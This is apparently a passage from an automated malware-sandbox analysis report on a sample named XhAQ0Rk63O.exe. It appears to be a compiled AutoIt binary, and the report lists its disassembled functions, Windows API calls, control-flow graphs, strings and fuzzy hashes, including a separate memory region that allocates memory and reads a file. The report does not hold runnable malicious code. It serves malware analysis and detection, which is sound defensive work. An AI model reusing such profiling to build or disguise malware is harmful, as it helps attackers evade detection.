                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • _wcscpy.LIBCMT ref: 00410CCC
                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                          • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                          • _wcscat.LIBCMT ref: 00429C43
                                                                                          • _wcslen.LIBCMT ref: 00429C55
                                                                                          • _wcslen.LIBCMT ref: 00429C66
                                                                                          • _wcscat.LIBCMT ref: 00429C80
                                                                                          • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                          • API String ID: 1004883554-2276155026
                                                                                          • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                          • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                          • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                          • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                          Function 004095C7 Relevance: 21.5, APIs: 14, Instructions: 539sleeptimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                            • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                          • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                          • timeGetTime.WINMM ref: 00409880
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                                          • String ID:
                                                                                          • API String ID: 3219444185-0
                                                                                          • Opcode ID: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                          • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                          • Opcode Fuzzy Hash: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                          • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A
                                                                                          Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                                          • String ID: FILE
                                                                                          • API String ID: 3888824918-3121273764
                                                                                          • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                          • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                          • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                          • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                                                                                          Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetSysColorBrush.USER32 ref: 00410326
                                                                                          • RegisterClassExW.USER32 ref: 00410359
                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                          • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                          • ImageList_ReplaceIcon.COMCTL32(0092DA18,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                          • API String ID: 2914291525-1005189915
                                                                                          • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                          • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                          • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                          • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                                          Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                          • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                          • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                          • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                          • RegisterClassExW.USER32 ref: 004102C6
                                                                                            • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                            • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                            • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                            • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                            • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                            • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                            • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(0092DA18,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                          • String ID: #$0$PGH
                                                                                          • API String ID: 423443420-3673556320
                                                                                          • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                          • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                          • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                          • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                                          Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _fseek.LIBCMT ref: 004525DA
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                          • __fread_nolock.LIBCMT ref: 00452618
                                                                                          • __fread_nolock.LIBCMT ref: 00452629
                                                                                          • __fread_nolock.LIBCMT ref: 00452644
                                                                                          • __fread_nolock.LIBCMT ref: 00452661
                                                                                          • _fseek.LIBCMT ref: 0045267D
                                                                                          • _malloc.LIBCMT ref: 00452689
                                                                                          • _malloc.LIBCMT ref: 00452696
                                                                                          • __fread_nolock.LIBCMT ref: 004526A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1911931848-0
                                                                                          • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                          • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                          • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                          • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                                                                                          Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1344 40f450-40f45c call 425210 1347 40f460-40f478 1344->1347 1347->1347 1348 40f47a-40f4a8 call 413990 call 410f70 1347->1348 1353 40f4b0-40f4d1 call 4151b0 1348->1353 1356 40f531 1353->1356 1357 40f4d3-40f4da 1353->1357 1358 40f536-40f540 1356->1358 1359 40f4dc-40f4de 1357->1359 1360 40f4fd-40f517 call 41557c 1357->1360 1361 40f4e0-40f4e2 1359->1361 1364 40f51c-40f51f 1360->1364 1363 40f4e6-40f4ed 1361->1363 1365 40f521-40f52c 1363->1365 1366 40f4ef-40f4f2 1363->1366 1364->1353 1367 40f543-40f54e 1365->1367 1368 40f52e-40f52f 1365->1368 1369 42937a-4293a0 call 41557c call 4151b0 1366->1369 1370 40f4f8-40f4fb 1366->1370 1371 40f550-40f553 1367->1371 1372 40f555-40f560 1367->1372 1368->1366 1380 4293a5-4293c3 call 4151d0 1369->1380 1370->1360 1370->1361 1371->1366 1375 429372 1372->1375 1376 40f566-40f571 1372->1376 1375->1369 1378 429361-429367 1376->1378 1379 40f577-40f57a 1376->1379 1378->1363 1381 42936d 1378->1381 1379->1366 1380->1358 1381->1375
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock_fseek_strcat
                                                                                          • String ID: AU3!$EA06
                                                                                          • API String ID: 3818483258-2658333250
                                                                                          • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                          • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                          • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                          • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                                                                                          Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1384 410130-410142 SHGetMalloc 1385 410148-410158 SHGetDesktopFolder 1384->1385 1386 42944f-429459 call 411691 1384->1386 1387 4101d1-4101e0 1385->1387 1388 41015a-410188 call 411691 1385->1388 1387->1386 1394 4101e6-4101ee 1387->1394 1396 4101c5-4101ce 1388->1396 1397 41018a-4101a1 SHGetPathFromIDListW 1388->1397 1396->1387 1398 4101a3-4101b1 call 411691 1397->1398 1399 4101b4-4101c0 1397->1399 1398->1399 1399->1396
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                          • String ID: C:\Users\user\Desktop\XhAQ0Rk63O.exe
                                                                                          • API String ID: 192938534-1422475815
                                                                                          • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                          • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                          • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                          • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                                          Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1402 401230-40123b 1403 401241-401272 call 4131f0 call 401be0 1402->1403 1404 4012c5-4012cd 1402->1404 1409 401274-401292 1403->1409 1410 4012ae-4012bf KillTimer SetTimer 1403->1410 1411 42aa61-42aa67 1409->1411 1412 401298-40129c 1409->1412 1410->1404 1415 42aa8b-42aaa7 Shell_NotifyIconW 1411->1415 1416 42aa69-42aa86 Shell_NotifyIconW 1411->1416 1413 4012a2-4012a8 1412->1413 1414 42aaac-42aab3 1412->1414 1413->1410 1417 42aaf8-42ab15 Shell_NotifyIconW 1413->1417 1418 42aad7-42aaf3 Shell_NotifyIconW 1414->1418 1419 42aab5-42aad2 Shell_NotifyIconW 1414->1419 1415->1410 1416->1410 1417->1410 1418->1410 1419->1410
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00401257
                                                                                            • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                            • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                            • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                            • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                          • KillTimer.USER32(?,?), ref: 004012B0
                                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                          • String ID:
                                                                                          • API String ID: 1792922140-0
                                                                                          • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                          • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                          • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                          • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                                          Function 040E6090 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1420 40e6090-40e613e call 40e3ab0 1423 40e6145-40e616b call 40e6fa0 CreateFileW 1420->1423 1426 40e616d 1423->1426 1427 40e6172-40e6182 1423->1427 1428 40e62bd-40e62c1 1426->1428 1434 40e6189-40e61a3 VirtualAlloc 1427->1434 1435 40e6184 1427->1435 1429 40e6303-40e6306 1428->1429 1430 40e62c3-40e62c7 1428->1430 1436 40e6309-40e6310 1429->1436 1432 40e62c9-40e62cc 1430->1432 1433 40e62d3-40e62d7 1430->1433 1432->1433 1437 40e62d9-40e62e3 1433->1437 1438 40e62e7-40e62eb 1433->1438 1439 40e61aa-40e61c1 ReadFile 1434->1439 1440 40e61a5 1434->1440 1435->1428 1441 40e6365-40e637a 1436->1441 1442 40e6312-40e631d 1436->1442 1437->1438 1445 40e62ed-40e62f7 1438->1445 1446 40e62fb 1438->1446 1447 40e61c8-40e6208 VirtualAlloc 1439->1447 1448 40e61c3 1439->1448 1440->1428 1443 40e637c-40e6387 VirtualFree 1441->1443 1444 40e638a-40e6392 1441->1444 1449 40e631f 1442->1449 1450 40e6321-40e632d 1442->1450 1443->1444 1445->1446 1446->1429 1453 40e620f-40e622a call 40e71f0 1447->1453 1454 40e620a 1447->1454 1448->1428 1449->1441 1451 40e632f-40e633f 1450->1451 1452 40e6341-40e634d 1450->1452 1456 40e6363 1451->1456 1457 40e634f-40e6358 1452->1457 1458 40e635a-40e6360 1452->1458 1460 40e6235-40e623f 1453->1460 1454->1428 1456->1436 1457->1456 1458->1456 1461 40e6272-40e6286 call 40e7000 1460->1461 1462 40e6241-40e6270 call 40e71f0 1460->1462 1468 40e628a-40e628e 1461->1468 1469 40e6288 1461->1469 1462->1460 1470 40e629a-40e629e 1468->1470 1471 40e6290-40e6294 CloseHandle 1468->1471 1469->1428 1472 40e62ae-40e62b7 1470->1472 1473 40e62a0-40e62ab VirtualFree 1470->1473 1471->1470 1472->1423 1472->1428 1473->1472
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040E6161
                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040E6387
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFileFreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 204039940-0
                                                                                          • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                          • Instruction ID: 9916d8ec626bfa4fdffa6c1e8578ad85a9e8522db0589151e369ad6a8aa8f9b1
                                                                                          • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                          • Instruction Fuzzy Hash: 26A11570E00208EFDB14CFA5D894BEEBBB5BF58304F208959E501BB281D776AA51CB95
                                                                                          Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1474 414f10-414f2c 1475 414f4f 1474->1475 1476 414f2e-414f31 1474->1476 1478 414f51-414f55 1475->1478 1476->1475 1477 414f33-414f35 1476->1477 1479 414f37-414f46 call 417f23 1477->1479 1480 414f56-414f5b 1477->1480 1492 414f47-414f4c call 417ebb 1479->1492 1481 414f6a-414f6d 1480->1481 1482 414f5d-414f68 1480->1482 1485 414f7a-414f7c 1481->1485 1486 414f6f-414f77 call 4131f0 1481->1486 1482->1481 1484 414f8b-414f9e 1482->1484 1490 414fa0-414fa6 1484->1490 1491 414fa8 1484->1491 1485->1479 1489 414f7e-414f89 1485->1489 1486->1485 1489->1479 1489->1484 1494 414faf-414fb1 1490->1494 1491->1494 1492->1475 1496 4150a1-4150a4 1494->1496 1497 414fb7-414fbe 1494->1497 1496->1478 1499 414fc0-414fc5 1497->1499 1500 415004-415007 1497->1500 1499->1500 1503 414fc7 1499->1503 1501 415071-415072 call 41e6b1 1500->1501 1502 415009-41500d 1500->1502 1511 415077-41507b 1501->1511 1505 41500f-415018 1502->1505 1506 41502e-415035 1502->1506 1507 415102 1503->1507 1508 414fcd-414fd1 1503->1508 1512 415023-415028 1505->1512 1513 41501a-415021 1505->1513 1515 415037 1506->1515 1516 415039-41503c 1506->1516 1514 415106-41510f 1507->1514 1509 414fd3 1508->1509 1510 414fd5-414fd8 1508->1510 1509->1510 1517 4150a9-4150af 1510->1517 1518 414fde-414fff call 41ee9b 1510->1518 1511->1514 1519 415081-415085 1511->1519 1520 41502a-41502c 1512->1520 1513->1520 1514->1478 1515->1516 1521 415042-41504e call 41453a call 41ed9e 1516->1521 1522 4150d5-4150d9 1516->1522 1527 4150b1-4150bd call 4131f0 1517->1527 1528 4150c0-4150d0 call 417f23 1517->1528 1535 415099-41509b 1518->1535 1519->1522 1526 415087-415096 1519->1526 1520->1516 1542 415053-415058 1521->1542 1524 4150eb-4150fd call 417f23 1522->1524 1525 4150db-4150e8 call 4131f0 1522->1525 1524->1492 1525->1524 1526->1535 1527->1528 1528->1492 1535->1496 1535->1497 1543 415114-415118 1542->1543 1544 41505e-415061 1542->1544 1543->1514 1544->1507 1545 415067-41506f 1544->1545 1545->1535
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
